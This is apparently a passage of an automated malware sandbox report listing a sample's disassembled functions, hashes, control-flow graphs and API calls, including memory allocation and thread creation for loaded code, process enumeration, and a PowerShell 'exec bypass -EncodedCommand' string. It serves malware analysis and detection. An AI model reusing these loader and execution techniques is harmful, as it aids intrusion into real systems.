                • Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                • Instruction Fuzzy Hash: 71A1E17130068146DB98FB72E8657AE23A3BF85790F44913DAE5E4B75ADF39C805C708
                Function 0066F014 Relevance: 4.6, APIs: 3, Instructions: 66networkCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 406 66f014-66f04f call 66f118 call 692660 411 66f051-66f053 406->411 412 66f058-66f097 WSAIoctl 406->412 413 66f0f6-66f10a 411->413 414 66f0b4-66f0be 412->414 415 66f099-66f0b0 412->415 416 66f0c0 414->416 417 66f0eb-66f0ee call 6925e8 414->417 415->414 418 66f0c5-66f0cf 416->418 422 66f0f4 417->422 420 66f0d6-66f0e2 418->420 421 66f0d1-66f0d4 418->421 420->417 424 66f0e4 420->424 421->420 423 66f0e6 421->423 422->413 423->417 424->418
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: IoctlSocketStartupclosesocket
                • String ID:
                • API String ID: 365704328-0
                • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                • Instruction ID: 2237a941fd2ae6f7b750c7a65c64ae29eca4d48651673b50a0ea1dd646ee54ff
                • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                • Instruction Fuzzy Hash: 72219D727087C083D7208F24F5A075AB7A6F3887E4F648635EE9D43B8ADB39C5568B00
                Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47memorythreadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 425 401595-4015c5 VirtualAlloc 426 4015c7-4015c9 425->426 427 4015e0-40162c call 401563 VirtualProtect CreateThread 426->427 428 4015cb-4015de 426->428 428->426
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: Virtual$AllocCreateProtectThread
                • String ID:
                • API String ID: 3039780055-0
                • Opcode ID: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                • Instruction ID: 4860219b4c01c513d172ce07c02c5f666ef61a193e7305fd3c1758593cceafba
                • Opcode Fuzzy Hash: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                • Instruction Fuzzy Hash: 83012B9231558051E7249B73AC04B9AAA91A38DBC9F48C135FE4B5FB65DA3CC145C308
                Function 00401704 Relevance: 4.5, APIs: 3, Instructions: 45fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 431 401704-40175c CreateFileA 432 40179c-4017a5 431->432 433 40175e-401760 431->433 434 401781-40178f CloseHandle 433->434 435 401762-40177f ReadFile 433->435 434->432 435->434 436 401791-40179a 435->436 436->433
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: File$CloseCreateHandleRead
                • String ID:
                • API String ID: 1035965006-0
                • Opcode ID: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                • Instruction ID: 7b1d3a4e01a1f8e2f055cb9d21318694f184940eaf5a18d2a9f539c7fc6a8346
                • Opcode Fuzzy Hash: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                • Instruction Fuzzy Hash: 2401D46531461186E7214B52AC04716B6A0B3D4BE9F648339BFA907BD4DB7DC54ACB08
                Function 0066F118 Relevance: 3.0, APIs: 2, Instructions: 42networkCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 437 66f118-66f12a 438 66f14e-66f150 437->438 439 66f12c-66f136 call 6925e0 437->439 441 66f152-66f159 438->441 442 66f1c9-66f1d1 438->442 444 66f13c-66f13e 439->444 441->442 443 66f15b-66f1c2 call 67b434 * 2 call 67b454 * 4 441->443 443->442 446 66f144 444->446 447 66f1d2-66f1e3 call 6925d8 call 680414 444->447 446->438
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CleanupStartup
                • String ID:
                • API String ID: 915672949-0
                • Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                • Instruction ID: e884fee1bb4c98631f262bdf6907ae2d834792547d9a64c214e260f98231aede
                • Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                • Instruction Fuzzy Hash: B2112D70601B42C6FB24AB60F86936432DBEB46344F50043D97194B3ABDF7E85A9CB15
                Function 001B96B4 Relevance: 1.6, APIs: 1, Instructions: 149libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 463 1b96b4-1b971e 464 1b9723-1b972c 463->464 465 1b994f-1b9963 464->465 466 1b9732-1b97b6 call 1b8b64 LoadLibraryA 464->466 469 1b97bb-1b97c4 466->469 470 1b97ca-1b97d0 469->470 471 1b993c-1b994a 469->471 472 1b98a9-1b9910 call 1b8b64 470->472 473 1b97d6-1b97ee 470->473 471->464 477 1b9913-1b9927 472->477 473->472 474 1b97f4-1b98a7 473->474 474->477 478 1b9929-1b9932 477->478 479 1b9937 477->479 478->479 479->469
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                • Instruction ID: efd88f1dba25db5d1f0e43baab4af7ca16a4ccce529ffc94f2ae934aebaebbcd
                • Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                • Instruction Fuzzy Hash: 7E619936219B8486CAA4CB1AE49035AB7A4F7C9B98F544125EFCE83B28DF3DD555CB00
                Function 00403040 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 481 403040-403051 call 401950 call 4017f8 486 403058-40305f SleepEx 481->486 486->486
                APIs
                  • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                  • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                  • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                  • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: Sleep$CountCreateThreadTickmalloc
                • String ID:
                • API String ID: 345437100-0
                • Opcode ID: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                • Instruction ID: 6421346cc2233eacca5f16f640383cf641c739f700fbc6dff330eaabfecbeef7
                • Opcode Fuzzy Hash: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                • Instruction Fuzzy Hash: EEC02B5430104440DB0833F3442733D06180B08388F0C043FFE0B322D28C3CC050030E
                Function 001B9324 Relevance: 1.3, APIs: 1, Instructions: 87memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 487 1b9324-1b9358 488 1b935e-1b9374 487->488 489 1b944d-1b9453 487->489 488->489 493 1b937a-1b93c2 488->493 490 1b9479-1b9482 489->490 491 1b9455-1b9474 VirtualAlloc 489->491 491->490 495 1b93ce-1b93d4 493->495 496 1b9402-1b9408 495->496 497 1b93d6-1b93de 495->497 496->489 498 1b940a-1b9445 496->498 497->496 499 1b93e0-1b93e6 497->499 498->489 499->496 500 1b93e8-1b9400 499->500 500->495
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                • Instruction ID: f8e345c21f6f9c9e839c43a71cb4834d3fbaf0f1daad40beabb24e80c0c04f1e
                • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                • Instruction Fuzzy Hash: 12419772628B8487DB64CB1AE48471AB7A1F7C8B94F105225FBDE87B68DB3CD4518F00

                Non-executed Functions

                Function 00686514 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: __doserrno_errno_invalid_parameter_noinfo
                • String ID: U
                • API String ID: 3902385426-4171548499
                • Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                • Instruction ID: ec14a26c44d62a4c083659281745be02a7e1ba2226b7defda2d8e2cb297eb1e3
                • Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                • Instruction Fuzzy Hash: 9902357231468186DB20EF28E4843AEB767F785B48F540216FB8987B58DF3EC956CB11
                Function 0067867C Relevance: 46.6, APIs: 22, Strings: 4, Instructions: 1078processCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32 ref: 00678FA0
                • CreateToolhelp32Snapshot.KERNEL32 ref: 00678FD9
                • Process32First.KERNEL32 ref: 00678FFB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
                • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                • API String ID: 718051232-1833344708
                • Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                • Instruction ID: 752ecabde62a66407af9c842d5c33e994ba71729f6791cc7c402b3997ffc8998
                • Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                • Instruction Fuzzy Hash: A8726D21B44641C6DB68DB2698583B913D3B789BC0FA4C126DE0F87B59EE39CD87CB41
                Function 00682F9C Relevance: 37.4, APIs: 19, Strings: 2, Instructions: 694COMMON
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00682FFD
                  • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                  • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                  • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                • _errno.LIBCMT ref: 00683002
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • _fileno.LIBCMT ref: 0068302F
                  • Part of subcall function 00685A54: _errno.LIBCMT ref: 00685A5D
                  • Part of subcall function 00685A54: _invalid_parameter_noinfo.LIBCMT ref: 00685A68
                • write_multi_char.LIBCMT ref: 0068366B
                • write_string.LIBCMT ref: 00683688
                • write_multi_char.LIBCMT ref: 006836A5
                • write_string.LIBCMT ref: 00683704
                • write_string.LIBCMT ref: 0068373B
                • write_multi_char.LIBCMT ref: 0068375D
                • free.LIBCMT ref: 00683771
                • _isleadbyte_l.LIBCMT ref: 00683842
                • write_char.LIBCMT ref: 00683858
                • write_char.LIBCMT ref: 00683879
                • _errno.LIBCMT ref: 0068397C
                • _invalid_parameter_noinfo.LIBCMT ref: 00683987
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID: $@
                • API String ID: 3318157856-1077428164
                • Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                • Instruction ID: 553c916e11350bd172c27715927b5fa2c9722ca7020bfaf0cce802a564827fec
                • Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                • Instruction Fuzzy Hash: D34244B26086A486EB25EF19D5543BE6BB3F741F90F140305DE4A17B98EB79CB41CB01
                Function 00682528 Relevance: 35.7, APIs: 19, Strings: 1, Instructions: 687COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00682589
                  • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                  • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                  • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                • _errno.LIBCMT ref: 0068258E
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • _fileno.LIBCMT ref: 006825BB
                  • Part of subcall function 00685A54: _errno.LIBCMT ref: 00685A5D
                  • Part of subcall function 00685A54: _invalid_parameter_noinfo.LIBCMT ref: 00685A68
                • write_multi_char.LIBCMT ref: 00682BEB
                • write_string.LIBCMT ref: 00682C08
                • write_multi_char.LIBCMT ref: 00682C25
                • write_string.LIBCMT ref: 00682C84
                • write_string.LIBCMT ref: 00682CBB
                • write_multi_char.LIBCMT ref: 00682CDD
                • free.LIBCMT ref: 00682CF1
                • _isleadbyte_l.LIBCMT ref: 00682DC2
                • write_char.LIBCMT ref: 00682DD8
                • write_char.LIBCMT ref: 00682DF9
                • _errno.LIBCMT ref: 00682EF3
                • _invalid_parameter_noinfo.LIBCMT ref: 00682EFE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID:
                • API String ID: 3318157856-3916222277
                • Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                • Instruction ID: 2896283ac4f2a1ac83dbb9fac2a01ee60df2fa2cca1931e9dd44a3f7c29ad242
                • Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                • Instruction Fuzzy Hash: 3D32547220868686EF29EF15D5643BE6FB3FB45B94F241305DE4A17B68DB78C841CB40
                Function 001C239C Relevance: 32.2, APIs: 16, Strings: 2, Instructions: 694COMMON
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001C23FD
                  • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                  • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                  • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                • _errno.LIBCMT ref: 001C2402
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • _fileno.LIBCMT ref: 001C242F
                  • Part of subcall function 001C4E54: _errno.LIBCMT ref: 001C4E5D
                  • Part of subcall function 001C4E54: _invalid_parameter_noinfo.LIBCMT ref: 001C4E68
                • write_multi_char.LIBCMT ref: 001C2A6B
                • write_string.LIBCMT ref: 001C2A88
                • write_multi_char.LIBCMT ref: 001C2AA5
                • write_string.LIBCMT ref: 001C2B04
                • write_string.LIBCMT ref: 001C2B3B
                • write_multi_char.LIBCMT ref: 001C2B5D
                • free.LIBCMT ref: 001C2B71
                • _isleadbyte_l.LIBCMT ref: 001C2C42
                • write_char.LIBCMT ref: 001C2C58
                • write_char.LIBCMT ref: 001C2C79
                • _errno.LIBCMT ref: 001C2D7C
                • _invalid_parameter_noinfo.LIBCMT ref: 001C2D87
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID: $@
                • API String ID: 3318157856-1077428164
                • Opcode ID: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                • Instruction ID: 894fc212aefd36256bb4a76e233e0adf7cc69257a1cca1681f47039ea8f6e663
                • Opcode Fuzzy Hash: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                • Instruction Fuzzy Hash: E8421032608B9487EB29CF59D544FBE7BB0B775B84F24100EDE4A47AA8DB78C840CB01
                Function 001C1928 Relevance: 28.6, APIs: 14, Strings: 2, Instructions: 645COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001C1989
                  • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                  • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                  • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                • _errno.LIBCMT ref: 001C198E
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • _fileno.LIBCMT ref: 001C19BB
                  • Part of subcall function 001C4E54: _errno.LIBCMT ref: 001C4E5D
                  • Part of subcall function 001C4E54: _invalid_parameter_noinfo.LIBCMT ref: 001C4E68
                • write_multi_char.LIBCMT ref: 001C1FEB
                • write_string.LIBCMT ref: 001C2008
                • _errno.LIBCMT ref: 001C22F3
                • _invalid_parameter_noinfo.LIBCMT ref: 001C22FE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                • String ID: -$0
                • API String ID: 3246410048-417717675
                • Opcode ID: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                • Instruction ID: a41121ecebb48c11a1d8c2787aaf8ced3d8e74097b573b9f87d3053120b2844f
                • Opcode Fuzzy Hash: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                • Instruction Fuzzy Hash: 8D3225726486D496EB29CB55D544FBE7BB0F776784F28100EEF4A47AA9DB38C840CB00
                Function 001C5914 Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 460COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: __doserrno_errno_invalid_parameter_noinfo
                • String ID: U
                • API String ID: 3902385426-4171548499
                • Opcode ID: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                • Instruction ID: 22f53ffff2642abfb00545f65aa01530eb72d904a6e8a21be2e57ddf3167229a
                • Opcode Fuzzy Hash: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                • Instruction Fuzzy Hash: F7022533214B8186DB208F28E484BAEB776F7A5798F54011EEB8943B54DF3DE985CB10
                Function 00677B38 Relevance: 26.0, APIs: 10, Strings: 7, Instructions: 545COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _snprintf.LIBCMT ref: 00677D66
                • _snprintf.LIBCMT ref: 00677D83
                • _snprintf.LIBCMT ref: 00677CA5
                  • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                  • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                • _snprintf.LIBCMT ref: 00677FD8
                • _snprintf.LIBCMT ref: 00678334
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$_errno_invalid_parameter_noinfo
                • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                • API String ID: 3442832105-1222817042
                • Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                • Instruction ID: f165d54bb1ff977ae2693509bbd572190c045ac707b9e2ef795a30137aa3c4d4
                • Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                • Instruction Fuzzy Hash: B032E962614E8592EB258F2DE0452E9B3B1FF98799F049101EF8D17B21EF38D6A7C344
                Function 00671C30 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150filetimeCOMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 00671C63
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                  • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                  • Part of subcall function 0066D074: htonl.WS2_32 ref: 0066D07F
                • GetCurrentDirectoryA.KERNEL32 ref: 00671CDB
                • FindFirstFileA.KERNEL32 ref: 00671D14
                • GetLastError.KERNEL32 ref: 00671D23
                • free.LIBCMT ref: 00671D5E
                • free.LIBCMT ref: 00671D6B
                  • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                  • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                  • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                • FileTimeToSystemTime.KERNEL32 ref: 00671D78
                • SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00671D89
                • FindNextFileA.KERNEL32 ref: 00671E46
                • FindClose.KERNEL32 ref: 00671E57
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                • API String ID: 723279517-1754256099
                • Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                • Instruction ID: fb2f42af140046c5152ca76007fff4314e7617e9a63a981f5e9d9da63bfdfffd
                • Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                • Instruction Fuzzy Hash: D051CF7270875196DB50DF66E8507AEA3A2F385B84F40402AEE4E47B58EF7CC60ACB40
                Function 001B6F38 Relevance: 18.5, APIs: 10, Strings: 2, Instructions: 545COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _snprintf.LIBCMT ref: 001B7166
                • _snprintf.LIBCMT ref: 001B7183
                • _snprintf.LIBCMT ref: 001B70A5
                  • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                  • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                • _snprintf.LIBCMT ref: 001B73D8
                • _snprintf.LIBCMT ref: 001B7734
                Strings
                • nop -exec bypass -EncodedCommand "%s", xrefs: 001B74D7
                • not create token: %d, xrefs: 001B7657
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$_errno_invalid_parameter_noinfo
                • String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
                • API String ID: 3442832105-3652497171
                • Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                • Instruction ID: 2f9b2cb9d9b2c9bc8f052c9aa5cc4283acf63cc8586ad332c123fcfba5c15db3
                • Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                • Instruction Fuzzy Hash: 5732FC62618EC492EB259F2DE0413E9B3B0FFA8799F445501DF8917B65EF38D2A6C340
                Function 00670F34 Relevance: 18.2, APIs: 12, Instructions: 163processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessAsUserA.ADVAPI32 ref: 00670F8F
                • GetLastError.KERNEL32 ref: 00670F9D
                • GetLastError.KERNEL32 ref: 00670FC1
